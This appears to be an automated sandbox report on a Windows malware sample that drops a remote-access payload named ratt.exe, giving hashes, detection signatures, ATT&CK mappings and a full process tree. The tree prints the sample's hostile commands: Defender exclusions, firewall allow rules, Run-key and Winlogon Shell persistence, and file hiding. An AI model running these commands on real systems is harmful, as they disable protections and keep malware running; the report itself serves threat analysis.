4883f291093a4645ea63d36541ed0ebd1bd49cd684191fba967d581bc8024d99

Analysis

max time kernel
43s
max time network
138s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
21/09/2023, 06:18

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

d484843e6e992cdf60c0340e540c30f3.exe
Size

1.4MB
MD5

d484843e6e992cdf60c0340e540c30f3
SHA1

be329ae06395f7ddf9e359793ad722cbd103bf5c
SHA256

4883f291093a4645ea63d36541ed0ebd1bd49cd684191fba967d581bc8024d99
SHA512

6c64fa1f32f33789ade39b126a93e5d17c1376c5d9e274b93a51b3a802d0fa824513f1b477eb743a68da72bc3de11f6d0db33fa79432ca83cec973f7ca9daab2
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

8^/10

evasion upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
1260	netsh.exe
2280	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000900000001225f-73.dat	acprotect
behavioral1/files/0x000900000001225f-72.dat	acprotect

Executes dropped EXE 2 IoCs

pid	Process
1992	7z.exe
1196	ratt.exe

Loads dropped DLL 4 IoCs

pid	Process
1748	cmd.exe
1748	cmd.exe
1992	7z.exe
2856	powershell.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001b000000016d69-71.dat	upx
behavioral1/files/0x001b000000016d69-70.dat	upx
behavioral1/memory/1748-69-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x001b000000016d69-68.dat	upx
behavioral1/files/0x001b000000016d69-67.dat	upx
behavioral1/memory/1992-74-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x000900000001225f-73.dat	upx
behavioral1/files/0x000900000001225f-72.dat	upx
behavioral1/memory/1992-75-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/1992-80-0x0000000000400000-0x0000000000432000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
1616	PING.EXE
3004	PING.EXE
1132	PING.EXE
2952	PING.EXE
2220	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2792	powershell.exe
2492	powershell.exe
2388	powershell.exe
780	powershell.exe
1644	powershell.exe
2856	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeSecurityPrivilege	2636	WMIC.exe
Token: SeTakeOwnershipPrivilege	2636	WMIC.exe
Token: SeLoadDriverPrivilege	2636	WMIC.exe
Token: SeSystemProfilePrivilege	2636	WMIC.exe
Token: SeSystemtimePrivilege	2636	WMIC.exe
Token: SeProfSingleProcessPrivilege	2636	WMIC.exe
Token: SeIncBasePriorityPrivilege	2636	WMIC.exe
Token: SeCreatePagefilePrivilege	2636	WMIC.exe
Token: SeBackupPrivilege	2636	WMIC.exe
Token: SeRestorePrivilege	2636	WMIC.exe
Token: SeShutdownPrivilege	2636	WMIC.exe
Token: SeDebugPrivilege	2636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2636	WMIC.exe
Token: SeRemoteShutdownPrivilege	2636	WMIC.exe
Token: SeUndockPrivilege	2636	WMIC.exe
Token: SeManageVolumePrivilege	2636	WMIC.exe
Token: 33	2636	WMIC.exe
Token: 34	2636	WMIC.exe
Token: 35	2636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeSecurityPrivilege	2636	WMIC.exe
Token: SeTakeOwnershipPrivilege	2636	WMIC.exe
Token: SeLoadDriverPrivilege	2636	WMIC.exe
Token: SeSystemProfilePrivilege	2636	WMIC.exe
Token: SeSystemtimePrivilege	2636	WMIC.exe
Token: SeProfSingleProcessPrivilege	2636	WMIC.exe
Token: SeIncBasePriorityPrivilege	2636	WMIC.exe
Token: SeCreatePagefilePrivilege	2636	WMIC.exe
Token: SeBackupPrivilege	2636	WMIC.exe
Token: SeRestorePrivilege	2636	WMIC.exe
Token: SeShutdownPrivilege	2636	WMIC.exe
Token: SeDebugPrivilege	2636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2636	WMIC.exe
Token: SeRemoteShutdownPrivilege	2636	WMIC.exe
Token: SeUndockPrivilege	2636	WMIC.exe
Token: SeManageVolumePrivilege	2636	WMIC.exe
Token: 33	2636	WMIC.exe
Token: 34	2636	WMIC.exe
Token: 35	2636	WMIC.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeIncreaseQuotaPrivilege	2928	WMIC.exe
Token: SeSecurityPrivilege	2928	WMIC.exe
Token: SeTakeOwnershipPrivilege	2928	WMIC.exe
Token: SeLoadDriverPrivilege	2928	WMIC.exe
Token: SeSystemProfilePrivilege	2928	WMIC.exe
Token: SeSystemtimePrivilege	2928	WMIC.exe
Token: SeProfSingleProcessPrivilege	2928	WMIC.exe
Token: SeIncBasePriorityPrivilege	2928	WMIC.exe
Token: SeCreatePagefilePrivilege	2928	WMIC.exe
Token: SeBackupPrivilege	2928	WMIC.exe
Token: SeRestorePrivilege	2928	WMIC.exe
Token: SeShutdownPrivilege	2928	WMIC.exe
Token: SeDebugPrivilege	2928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2928	WMIC.exe
Token: SeRemoteShutdownPrivilege	2928	WMIC.exe
Token: SeUndockPrivilege	2928	WMIC.exe
Token: SeManageVolumePrivilege	2928	WMIC.exe
Token: 33	2928	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1464 wrote to memory of 1748	1464	d484843e6e992cdf60c0340e540c30f3.exe	28
PID 1464 wrote to memory of 1748	1464	d484843e6e992cdf60c0340e540c30f3.exe	28
PID 1464 wrote to memory of 1748	1464	d484843e6e992cdf60c0340e540c30f3.exe	28
PID 1464 wrote to memory of 1748	1464	d484843e6e992cdf60c0340e540c30f3.exe	28
PID 1748 wrote to memory of 2788	1748	cmd.exe	30
PID 1748 wrote to memory of 2788	1748	cmd.exe	30
PID 1748 wrote to memory of 2788	1748	cmd.exe	30
PID 1748 wrote to memory of 2788	1748	cmd.exe	30
PID 2788 wrote to memory of 2812	2788	cmd.exe	31
PID 2788 wrote to memory of 2812	2788	cmd.exe	31
PID 2788 wrote to memory of 2812	2788	cmd.exe	31
PID 2788 wrote to memory of 2812	2788	cmd.exe	31
PID 1748 wrote to memory of 2644	1748	cmd.exe	32
PID 1748 wrote to memory of 2644	1748	cmd.exe	32
PID 1748 wrote to memory of 2644	1748	cmd.exe	32
PID 1748 wrote to memory of 2644	1748	cmd.exe	32
PID 2644 wrote to memory of 2636	2644	cmd.exe	33
PID 2644 wrote to memory of 2636	2644	cmd.exe	33
PID 2644 wrote to memory of 2636	2644	cmd.exe	33
PID 2644 wrote to memory of 2636	2644	cmd.exe	33
PID 1748 wrote to memory of 2792	1748	cmd.exe	35
PID 1748 wrote to memory of 2792	1748	cmd.exe	35
PID 1748 wrote to memory of 2792	1748	cmd.exe	35
PID 1748 wrote to memory of 2792	1748	cmd.exe	35
PID 1748 wrote to memory of 2492	1748	cmd.exe	36
PID 1748 wrote to memory of 2492	1748	cmd.exe	36
PID 1748 wrote to memory of 2492	1748	cmd.exe	36
PID 1748 wrote to memory of 2492	1748	cmd.exe	36
PID 1748 wrote to memory of 2388	1748	cmd.exe	37
PID 1748 wrote to memory of 2388	1748	cmd.exe	37
PID 1748 wrote to memory of 2388	1748	cmd.exe	37
PID 1748 wrote to memory of 2388	1748	cmd.exe	37
PID 1748 wrote to memory of 780	1748	cmd.exe	38
PID 1748 wrote to memory of 780	1748	cmd.exe	38
PID 1748 wrote to memory of 780	1748	cmd.exe	38
PID 1748 wrote to memory of 780	1748	cmd.exe	38
PID 1748 wrote to memory of 1644	1748	cmd.exe	39
PID 1748 wrote to memory of 1644	1748	cmd.exe	39
PID 1748 wrote to memory of 1644	1748	cmd.exe	39
PID 1748 wrote to memory of 1644	1748	cmd.exe	39
PID 1748 wrote to memory of 1992	1748	cmd.exe	40
PID 1748 wrote to memory of 1992	1748	cmd.exe	40
PID 1748 wrote to memory of 1992	1748	cmd.exe	40
PID 1748 wrote to memory of 1992	1748	cmd.exe	40
PID 1748 wrote to memory of 2856	1748	cmd.exe	41
PID 1748 wrote to memory of 2856	1748	cmd.exe	41
PID 1748 wrote to memory of 2856	1748	cmd.exe	41
PID 1748 wrote to memory of 2856	1748	cmd.exe	41
PID 2856 wrote to memory of 1260	2856	powershell.exe	42
PID 2856 wrote to memory of 1260	2856	powershell.exe	42
PID 2856 wrote to memory of 1260	2856	powershell.exe	42
PID 2856 wrote to memory of 1260	2856	powershell.exe	42
PID 2856 wrote to memory of 2280	2856	powershell.exe	43
PID 2856 wrote to memory of 2280	2856	powershell.exe	43
PID 2856 wrote to memory of 2280	2856	powershell.exe	43
PID 2856 wrote to memory of 2280	2856	powershell.exe	43
PID 2856 wrote to memory of 2920	2856	powershell.exe	44
PID 2856 wrote to memory of 2920	2856	powershell.exe	44
PID 2856 wrote to memory of 2920	2856	powershell.exe	44
PID 2856 wrote to memory of 2920	2856	powershell.exe	44
PID 2920 wrote to memory of 2928	2920	cmd.exe	45
PID 2920 wrote to memory of 2928	2920	cmd.exe	45
PID 2920 wrote to memory of 2928	2920	cmd.exe	45
PID 2920 wrote to memory of 2928	2920	cmd.exe	45

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
860	attrib.exe

C:\Users\Admin\AppData\Local\Temp\d484843e6e992cdf60c0340e540c30f3.exe
"C:\Users\Admin\AppData\Local\Temp\d484843e6e992cdf60c0340e540c30f3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2636
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1260
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2920
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="UUVOHKNL" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2396
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:2992
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      PID:1196
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2152
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        6⤵
        Runs ping.exe
        
        PID:1616
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:2380
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:860
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    PID:696
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        5⤵
        Runs ping.exe
        
        PID:2952
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:884
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\Admin\Music\rot.exe"
      4⤵
      PID:1008
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 18
        5⤵
        Runs ping.exe
        
        PID:2220
    - - C:\Users\Admin\Music\rot.exe
        
        "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:1624

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 18
1⤵
- Runs ping.exe
PID:3004

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 14
1⤵
- Runs ping.exe
PID:1132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
268.2MB

MD5
0983b47cf77ee10453311707cf0b213b

SHA1
f6a6e5833feece86759fc69112a417ebb93f4d3d

SHA256
2d782d9ad050aa6466ea06c941a3e128d07bf0a9b3d8b068fec82357023a00a7

SHA512
f34e095118e17c4d80b8184102ae18c32053b5a251e996fa524668e147ae49a7498de146c938a623684645f0a9632e09d82e217e740bb2c417b402a64e4258cc

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
258.3MB

MD5
f11982ecc80de4b3b877065b0be4c158

SHA1
cf7a5c2bb549ae5391df550aeec25f7dcfcfec68

SHA256
4ba05da3db247d0b6c6ca45f9ceecbab63fc0c72c38bdc83b75f3fc9e33e53e2

SHA512
74bfed0134f36b10b33277af8d7462465c3ed9803d7f0374fe747590cf5823611e276c9a93efee21ff3e2b999e238c0de12c9b0b93e2bed860d73c89bff03488

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
228.2MB

MD5
3946facd4c093c8ad3390b93e6c8bc1e

SHA1
f6a77f6b2a31d6b36fe26d49bd52514f8e98c9c7

SHA256
9b4713209bdc18b0600140f280b8afbca562ab42b1de0d3e4a71d72465489055

SHA512
0e186bb83f8601902ba4eb73fcb0d75062946235712b4d95d4b2caa882a1c0b99b2632661a4ad22ed012d03e36df4df27c6e97906a58e800cf784d33e9a786da

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
457.4MB

MD5
80eb00ad7bb861f1a47372d3fc44517a

SHA1
41199661b9e8ae3bfcd4006c66abe98b75915033

SHA256
44634e228fa3e1a3089b0696b1f47c104d26c0af502b55dde4d84140a6373c75

SHA512
2dfb3f0bb12fe613a7516c384cf6fe5cd7db83d339b4d3d05314f501b8f9e602a5004778bf5f23691652b45abc8ebe1f7f33cd2e78febcfb7d646f8ff2960a19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IU7CAAJ3BUA8VXLMOQHT.temp

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00b11754bbdd634bcf50202b6b316d48

SHA1
0828e220f498abb0f8dca4bfc43571e301847eb3

SHA256
c5d367444b93a6ab58ae73ce02f6e91068f95867c639c108daf716b969ccbb5f

SHA512
33074f8699d442a0d204bfaa17de46f6a0554921236724de9f9b6a368d927901c8926fd8b0cbfba9ec2fedbc9eb73d81d8378fe6623f4164b9dd718d35401f18

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
69.4MB

MD5
1c4e16c0276b971ba23c63f11b8ada9f

SHA1
db938937e9d3af27f1d72b5c2c8a148dd07ccea1

SHA256
8b9509f41e05fe27fde00bd6e2e80a04b585884bbcdce88b0ccf4710337d3a07

SHA512
f3e2dc8c1ef53357f06c0bea7ab9db54e940d0b8a42835f3edf0bd06e73cbf0079d4b95f01c5d2ceff0ca4a31222927b15bef41edbfdd581718e1c404c79ac14

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
21.9MB

MD5
80c746d9605e5d2929ebda4c96089d16

SHA1
5904f0ee3576c8421d6cb1c1921ef6255d468524

SHA256
b1a70be34d478c82d6a4631c8c1c2728904a634f42730df683dab937241fb1f9

SHA512
1331e0e7a2fd14266d8b5018690b38abe18343bae1ce9e74f81a05cf68f6dedcb5453ae2641976b981dd3660b85210837178cf6dfc21a7049be9a9e2bbb1faba

Download Submit
C:\Users\Admin\Music\rot.exe

Filesize
21.8MB

MD5
0b14ec13e64c9b364f656b15e4b4f5d7

SHA1
1717b96306226702f4ecd347d0149d8f6d38f1de

SHA256
79320fdb38cddce5ab8ac3e5d42eaf223d9b6dc935aa9f05e8b373bee3b9a97f

SHA512
2191fb0e56d965e811f4e65a476d01b838ea78529ebc304cf8b0b9415f3f6eae5f09aefa326696c24c255e4e155fe0e5a52e8a85586d011bf55cc53defdb3494

Download Submit
\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
227.9MB

MD5
6dcc338a1d571256a8fbc5ae6753f524

SHA1
69a310331e427af9b8747887186495504e52bb87

SHA256
1434fa0eced8bcca755766c7aa0f60bce0f75305f5bc0b58c7e30cf97004d4d5

SHA512
f60a5a5fbc029ff0a2c55c5885f226b530b5db06891563c7abf20f7514cb3ca9987b674d43b8fa36f87379d74b2cfb961e8d562e5e15fe2c86e3abbb332a997a

Download Submit
\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
